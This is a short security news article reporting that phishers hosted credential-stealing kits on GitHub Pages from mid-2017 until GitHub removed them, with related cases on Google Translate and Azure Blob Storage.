Malware Actors Abuse GitHub Platform to Store Phishing Kits

It has been a common practice in recent years for cybercriminals to host malicious kits on social networking and consumer cloud storage platforms like Facebook, Dropbox, Paypal, eBay, and Google Drive. Using such domains allows bypassing whitelists and network defenses so that the malware operators can blend their activities within the legitimate web traffic and reach their targets easily.

In April 2019, researchers found out that at least since mid-2017 malicious actors have also been abusing the popular GitHub code hosting platform to store phishing kits on the $github_username.github.io domain. The phishers used GitHub free code repositories, thus cybersecurity experts could monitor and analyze all their actions. It has been observed that the crooks customized the phishing kits according to their particular purposes, for example, indicators of compromise including shortened links were updated, or landing pages were modified to circumvent GitHub limitations by using a PHP script hosted on a remote domain instead of the one local for the kit.

One of the phishing kits that redirected users through spam emails to malicious landing pages hosted on GitHub was designed to steal credentials from the customers of a retail bank. Researchers also discovered that the credentials and the other sensitive information collected by the phishing kits were then sent to other compromised servers controlled by the same people who owned the corresponding GitHub accounts. Also, github.io does not offer PHP back-end services, so the phishing kits stored on the platform did not include PHP-based tools.

Researchers stated that GitHub has been extremely responsive in fixing the abuse of their system, and all of the discovered accounts involved in the phishing campaigns have already been taken down.

Similar to the GitHub case, in February 2019, another phishing tool disguised as Google Translate on mobile devices attempted to steal Facebook and Google login details. Microsoft’s Azure Blob Storage has also been misused in a similar fashion - attackers tried to steal Office 365, Outlook, Azure AD, and Microsoft account credentials by making compromised landing pages look legit through the use of windows.net subdomain's valid Microsoft SSL certificates.